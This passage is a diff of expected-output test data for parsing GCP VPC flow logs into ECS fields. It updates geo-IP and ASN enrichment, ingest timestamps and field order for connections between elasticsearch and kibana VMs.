"{\"insertId\":\"198begsfh44xxv\",\"jsonPayload\":{\"bytes_sent\":\"121593\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65274,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"610\",\"reporter\":\"SRC\",\"rtt_msec\":\"209\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:01.270996793Z", - "end": "2019-06-14T03:49:56.220838853Z", - "id": "198begsfh44xxv", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -16222,11 +17030,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" - }, + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 60968, @@ -16234,6 +17047,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415259521Z", + "original": "{\"insertId\":\"198begsfh44xy7\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:43:39.653136947Z", + "end": "2019-06-14T03:43:39.777977145Z", + "id": "198begsfh44xy7", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16245,46 +17068,6 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:17.291Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "67.43.156.13", - "10.87.40.76" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392077100Z", - "original": "{\"insertId\":\"198begsfh44xy7\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:43:39.653136947Z", - "end": "2019-06-14T03:43:39.777977145Z", - "id": "198begsfh44xy7", - "category": "network", - "type": "connection" } }, { @@ -16293,11 +17076,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33530, @@ -16375,7 +17163,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392082700Z", + "ingested": "2021-12-14T14:43:27.415259989Z", "original": "{\"insertId\":\"198begsfh44xxs\",\"jsonPayload\":{\"bytes_sent\":\"177471\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205194199Z\",\"packets_sent\":\"246\",\"reporter\":\"SRC\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140301693Z", @@ -16386,18 +17174,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.291Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.139.99.242", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 82 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65275, @@ -16411,6 +17232,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415260422Z", + "original": "{\"insertId\":\"198begsfh44xxq\",\"jsonPayload\":{\"bytes_sent\":\"53315\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65275,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"588\",\"reporter\":\"SRC\",\"rtt_msec\":\"82\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.565734921Z", + "end": "2019-06-14T03:49:56.316847800Z", + "id": "198begsfh44xxq", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16422,22 +17253,27 @@ "iana_number": "6", "packets": 588, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", + "10.87.40.76", "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 82 + "ms": 36 } }, "source": { @@ -16453,28 +17289,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392088300Z", - "original": "{\"insertId\":\"198begsfh44xxq\",\"jsonPayload\":{\"bytes_sent\":\"53315\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65275,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"588\",\"reporter\":\"SRC\",\"rtt_msec\":\"82\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.565734921Z", - "end": "2019-06-14T03:49:56.316847800Z", - "id": "198begsfh44xxq", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34450, @@ -16488,6 +17314,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415260816Z", + "original": "{\"insertId\":\"198begsfh44xxz\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34450,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:47:38.189569840Z", + "end": "2019-06-14T03:47:38.299054333Z", + "id": "198begsfh44xxz", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16499,25 +17335,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.13", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -16528,23 +17363,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392092100Z", - "original": "{\"insertId\":\"198begsfh44xxz\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34450,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:38.189569840Z", - "end": "2019-06-14T03:47:38.299054333Z", - "id": "198begsfh44xxz", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -16553,11 +17379,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 60122, @@ -16565,6 +17396,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415261353Z", + "original": "{\"insertId\":\"198begsfh44xxy\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60122},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:39.087226326Z", + "end": "2019-06-14T03:41:39.207635184Z", + "id": "198begsfh44xxy", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16576,19 +17417,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.87.40.76" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 176 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -16599,38 +17451,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392095500Z", - "original": "{\"insertId\":\"198begsfh44xxy\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60122},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:39.087226326Z", - "end": "2019-06-14T03:41:39.207635184Z", - "id": "198begsfh44xxy", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 53879, @@ -16644,6 +17478,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415261858Z", + "original": "{\"insertId\":\"198begsfh44xxu\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53879,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"176\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760414869Z", + "end": "2019-06-14T03:49:56.312105537Z", + "id": "198begsfh44xxu", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16655,22 +17499,27 @@ "iana_number": "6", "packets": 608, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", + "10.87.40.76", "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 176 + "ms": 36 } }, "source": { @@ -16686,28 +17535,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392099800Z", - "original": "{\"insertId\":\"198begsfh44xxu\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53879,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"176\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760414869Z", - "end": "2019-06-14T03:49:56.312105537Z", - "id": "198begsfh44xxu", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 60968, @@ -16721,6 +17560,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415262294Z", + "original": "{\"insertId\":\"198begsfh44xxo\",\"jsonPayload\":{\"bytes_sent\":\"1794\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60968,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:43:39.653136947Z", + "end": "2019-06-14T03:43:39.777977145Z", + "id": "198begsfh44xxo", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16732,25 +17581,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.14", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -16761,23 +17609,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392104200Z", - "original": "{\"insertId\":\"198begsfh44xxo\",\"jsonPayload\":{\"bytes_sent\":\"1794\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60968,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:43:39.653136947Z", - "end": "2019-06-14T03:43:39.777977145Z", - "id": "198begsfh44xxo", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -16786,11 +17625,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 60756, @@ -16798,6 +17642,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415262685Z", + "original": 